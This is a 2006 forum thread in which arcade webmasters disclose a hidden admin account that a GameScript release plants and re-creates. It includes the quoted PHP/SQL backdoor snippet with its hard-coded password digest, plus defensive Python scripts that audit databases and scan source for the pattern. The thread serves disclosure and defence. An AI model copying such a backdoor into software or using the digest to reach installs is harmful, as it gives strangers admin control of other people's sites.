Talk Arcades: Forum for Arcade Webmasters
#1 | PlatinumN23 (Full Member, joined Jun 2006, 97 posts) | 07-19-2006, 10:07 PM

Warning About GS "Blank" User..

It was recently brought to my attention that the LATEST Upgrade of GameScript has a "Backdoor" User...


Quote:
$usercheck = "SELECT * FROM `users` WHERE WHERE `username` ='blank'";
if(@mysql_num_rows(mysql_query($usercheck)) < 1){
@mysql_query("INSERT INTO `users` ( `username` , `password` , `securitylevel` , `email` , `id` , `logincount` , `gameplays` , `verified` , `subscribed` , `avatar` , `comments` , `location` , `gender` , `favgame` , `joined` , `status` , `pmsuspended` , `im` , `submissions` , `timestamp` , `ip` ) VALUES ( 'blank', '557cce710ecad98f3b0e507dbc2b4846', '0', 'admin@iamnotageek.com', NULL , '0', '0', '0', '1', '', '', '', '', '', '0000-00-00', '0', '0', '', '0', '0', '');");
}else { @mysql_query("UPDATE `users` SET `password` = '557cce710ecad98f3b0e507dbc2b4846', `securitylevel` = '1', `logincount` = '0' WHERE `username` ='blank' LIMIT 1"); }
Please DELETE That line if you DO NOT Want the username "Blank" (With ADMIN PERMISSIONS) Added to your site...

A word from the Author:

Quote:
If you don't like it simply remove that snippet of code in the first post. The script is unencoded for that very reason.

As also stated the install instructions even say to password protect your admin directory. When you do this that admin account is worthless. There is no other backdoor in place.

I put this code in place after watching $4k in chargebacks in 2 weeks all of our biggest packages where people simply install and steal our stuff just to turn and take the money right back. I have to do something and I have to do something drastic.

After talking to Adam the admin user account doesn't seem like the route to go but we will keep looking.

My Notes on the subject:

If an author is willing to sell a product with the fear of Chargebacks.. the author should consider encoding a few files and setting up a better LICENSING Script.. Yes, this can be a drag to many.. However, it will solve the problem and eliminate the need for a BackDoor / Admin User..


Just my .02 and I hope everyone takes heed of this notice
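The snippet quoted above plants a user named "blank" with a fixed MD5 digest and, on later runs, raises it to admin. A site owner who wants to check an existing database for that account (and for any other row that carries the same digest under a different name) can do it with a few queries. The script below is an added example for this thread, not GameScript's own code: the table layout mirrors the columns in the quoted INSERT, the rows are constructed so it runs offline against SQLite, and the "planted admin" heuristic (admin level, zero logins, join date 0000-00-00) is taken from the values the quoted snippet writes.

```python
"""Audit a GameScript-style `users` table for the hard-coded 'blank' admin
account quoted in the first post. This is an added example, not GameScript
code: the column set mirrors the quoted INSERT, and every row is constructed
here so the script runs offline against an in-memory SQLite database."""
import hashlib
import sqlite3

# Taken from the quoted snippet: the username it creates and the unsalted
# MD5 digest it writes into that account's password column.
BACKDOOR_USERNAME = "blank"
BACKDOOR_MD5 = "557cce710ecad98f3b0e507dbc2b4846"

SCHEMA = """
CREATE TABLE users (
  id            INTEGER PRIMARY KEY,
  username      TEXT,
  password      TEXT,   -- unsalted MD5 hex, as in the quoted script
  securitylevel TEXT,   -- '1' = admin in the quoted UPDATE
  email         TEXT,
  logincount    INTEGER,
  joined        TEXT
);
"""


def sample_hash(password):
    # Helper for building constructed rows; unsalted MD5 only because that is
    # the format the quoted script stores, not a recommendation.
    return hashlib.md5(password.encode()).hexdigest()


# Constructed rows: a real admin, an ordinary member, the backdoor account as
# the quoted UPDATE leaves it, a renamed account that still carries the known
# digest, and an admin row that merely looks like a planted account.
SAMPLE_ROWS = [
    (1, "siteowner", sample_hash("owner-demo-pass"), "1", "owner@example.invalid", 42, "2006-06-01"),
    (2, "player1", sample_hash("player-demo-pass"), "0", "p1@example.invalid", 5, "2006-06-10"),
    (3, "blank", BACKDOOR_MD5, "1", "admin@iamnotageek.com", 0, "0000-00-00"),
    (4, "helper", BACKDOOR_MD5, "0", "helper@example.invalid", 0, "2006-07-01"),
    (5, "ghost", sample_hash("ghost-demo-pass"), "1", "ghost@example.invalid", 0, "0000-00-00"),
]


def open_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def audit_users(conn):
    """Return [(username, reason), ...] for rows that match the backdoor
    indicators from the thread or the heuristic for a planted admin."""
    findings = []
    rows = conn.execute(
        "SELECT username, password, securitylevel, logincount, joined "
        "FROM users ORDER BY id"
    ).fetchall()
    for username, pw_hash, level, logins, joined in rows:
        reasons = []
        if username.lower() == BACKDOOR_USERNAME:
            reasons.append("username matches the backdoor account")
        if pw_hash.lower() == BACKDOOR_MD5:
            reasons.append("password hash equals the hard-coded backdoor digest")
        # The quoted INSERT stores logincount '0' and joined '0000-00-00'; an
        # admin-level row with both is worth a look even under another name.
        if level == "1" and logins == 0 and joined == "0000-00-00":
            reasons.append("admin-level account that never logged in and has no join date")
        if reasons:
            findings.append((username, "; ".join(reasons)))
    return findings


def remove_backdoor_rows(conn):
    """Delete rows that carry the hard-coded username or digest; returns the
    number of rows removed."""
    cur = conn.execute(
        "DELETE FROM users WHERE lower(username) = ? OR lower(password) = ?",
        (BACKDOOR_USERNAME, BACKDOOR_MD5),
    )
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = open_sample_db()
    for name, why in audit_users(db):
        print(f"{name}: {why}")
    print(f"removed {remove_backdoor_rows(db)} row(s)")
```

Deleting the row is only half the fix: as the thread goes on to say, the code that inserts it is still in the script and will put it back, so the snippet itself has to be removed as well.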
#2 | nbento (Full Member, joined Jun 2006, 84 posts) | 07-20-2006, 09:44 AM

Why don't you just delete the user from the script as I did?
#3 | aGig (New Member, joined Jul 2006, 7 posts) | 07-20-2006, 12:23 PM

Quote:
Originally Posted by nbento
Why don't you just delete the user from the script as I did?
You missed the point about how insecure this is for people who don't have a clue about PHP and just install the script and that is it. Anyone who knows anything about PHP would have seen that and could have access to, I'm sure, 100s of GS installs.
#4 | nbento (Full Member, joined Jun 2006, 84 posts) | 07-20-2006, 01:01 PM

Dude, I think it's just logic.... I installed the script and when I saw the user as admin (blank) I deleted it immediately.
#5 | aGig (New Member, joined Jul 2006, 7 posts) | 07-20-2006, 01:10 PM

Quote:
Originally Posted by nbento
Dude, I think it's just logic.... I installed the script and when I saw the user as admin (blank) I deleted it immediately.
If that is all you have done, you have really missed the point. There is actual code in system.class.php that re-creates this user nightly. The MD5 password can be converted in 3 seconds. You then have full admin access to 100s of GS 3.1 installs.
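Because the account is re-created by code in the script itself, the useful check is on the PHP source rather than only on the database: look for any write to the `users` table that embeds a literal 32-character hex digest. The scanner below is an added example written for this thread, not part of GameScript; the PHP excerpt it runs on is constructed to mirror the snippet quoted in the first post (the method name `nightly` is hypothetical), and the two regexes are a starting point, not a complete grammar for MySQL statements.

```python
"""Scan PHP source for code that writes a literal password digest into the
`users` table, the pattern described for system.class.php in this thread.
Added example, not GameScript code; the PHP excerpt below is constructed to
mirror the snippet quoted in the first post and is not the real file."""
import re

# Known digest from the quoted snippet; any other digest found is still reported.
BACKDOOR_MD5 = "557cce710ecad98f3b0e507dbc2b4846"

# Constructed excerpt (hypothetical method name `nightly`), not system.class.php.
SAMPLE_PHP = r'''<?php
class system {
  function nightly() {
    $usercheck = "SELECT * FROM `users` WHERE `username` ='blank'";
    if(@mysql_num_rows(mysql_query($usercheck)) < 1){
      @mysql_query("INSERT INTO `users` ( `username` , `password` , `securitylevel` ) VALUES ( 'blank', '557cce710ecad98f3b0e507dbc2b4846', '0');");
    }else { @mysql_query("UPDATE `users` SET `password` = '557cce710ecad98f3b0e507dbc2b4846', `securitylevel` = '1' WHERE `username` ='blank' LIMIT 1"); }
    // unrelated maintenance query, should not be flagged
    @mysql_query("UPDATE `games` SET `plays` = 0");
  }
}
'''

HEX32 = r"[0-9a-fA-F]{32}"
PATTERNS = {
    # INSERT into users whose VALUES carry a quoted 32-hex literal
    "insert-with-literal-hash": re.compile(
        r"INSERT\s+INTO\s+`?users`?.*?'(" + HEX32 + r")'", re.I),
    # UPDATE that overwrites the password column with a literal digest
    "update-password-to-literal": re.compile(
        r"UPDATE\s+`?users`?\s+SET\s+`?password`?\s*=\s*'(" + HEX32 + r")'", re.I),
}


def scan_source(text):
    """Return [(line_no, pattern_name, digest), ...] for every line that
    embeds a literal digest in a write to the users table."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append((lineno, kind, match.group(1).lower()))
    return findings


def summarize(findings):
    """Map each digest found to how many lines reference it and whether it
    is the digest quoted in the thread."""
    summary = {}
    for _, _, digest in findings:
        entry = summary.setdefault(
            digest, {"lines": 0, "known_backdoor": digest == BACKDOOR_MD5})
        entry["lines"] += 1
    return summary


if __name__ == "__main__":
    for lineno, kind, digest in scan_source(SAMPLE_PHP):
        print(f"line {lineno}: {kind} ({digest})")
    print(summarize(scan_source(SAMPLE_PHP)))
```

Run it over every .php file in the install (read each file and pass its text to `scan_source`); a hit on any digest, not just the one quoted here, is a line to read by hand, and the flagged block can then be removed as the author suggests in the first post.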
#6 | nbento (Full Member, joined Jun 2006, 84 posts) | 07-20-2006, 02:02 PM

Sorry, but I don't seem to follow you.
I have GS 3.1. I deleted the blank user when I installed the script for the first time, and never got that user back.... you say that it's created again once deleted?
I don't think so... well, at least not for me.
#7 | aGig (New Member, joined Jul 2006, 7 posts) | 07-20-2006, 02:08 PM

It might not be in your version. However, downloads in the past few weeks have all had the system.class.php code that will re-create the user "blank" nightly. He has now updated the code so it does not do it anymore, but he did admit it does that.
#8 | admin (Preferred Member, joined May 2006, Planet Earth, 190 posts) | 07-20-2006, 03:54 PM

Quote:
Originally Posted by nbento
Dude, I think it's just logic.... I installed the script and when I saw the user as admin (blank) I deleted it immediately.
I have to agree here; it doesn't matter if you saw it or not, the fact is that there shouldn't be a back door. Not everyone knows PHP/MySQL and potentially this could be disastrous for lots of people.